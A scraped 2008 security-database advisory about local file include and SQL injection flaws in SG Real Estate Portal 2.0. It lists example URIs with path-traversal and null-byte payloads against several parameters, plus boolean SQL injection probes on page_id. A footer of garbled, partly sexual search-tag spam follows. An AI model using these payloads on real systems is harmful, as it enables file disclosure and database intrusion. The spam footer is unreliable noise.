exploits , vulnerabilities , articles , SG Real Estate Portal Local File Include and SQL Injection Vulnerabilities
| Title |
SG Real Estate Portal Local File Include and SQL Injection Vulnerabilities |
| Published |
2008-09-30-12:00AM |
| Updated |
2008-09-30-07:48PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
SirGod |
| Vulnerable |
SG Real Estate Portal SG Real Estate Portal 2.0
|
| Not Vulnerable |
|
| Code |
Attackers can exploit these issues via a browser.The following example URIs are available:http://www.example.com/path/index.php?mod=../../../../autoexec.bat%00
http://www.example.com/path/index.php?page=/../../../../autoexec.bat%00
http://www.example.com/path/index.php?lang=/../../../../autoexec.bat%00&page_id=106
http://www.example.com/path/admin/index.php?category=security&action=../../../../../autoexec.bat%00
http://www.example.com/path/admin/index.php?category=security&folder=../../../../. /autoexec.bat%00page=params&id=8
http://www.example.com/path/index.php?lang=EN&page_id=106 and 1=1
http://www.example.com/path/index.php?lang=EN&page_id=106 and 1=2 |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Tue, 02 Dec 2008 22:58:53 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
IceWarp We apache 2.0 youpron.co punjabsex. apache 2.0 WWW.Sex18. punjabsex. punjabsex. FileZilla fucking in www.mobile mambo Remo w w w. sex WWW.NAMITH oracle noelia vid t977t /oneadmin/ www.petard find passw t977t /search/ex Vivvo Arti t430t t430t www.gadism hack ftp sadame hec www.gadism Worms Sexs india t430t lo li pop full xxx s t362t search%2Fe Sex in USA Www sex an Linux Kern Xxx con com_adsman shhvat sar My chat ga Se se imag Web Wiz Ti phpunity-p www.bluese news for c com_adsman phpunity-p
|
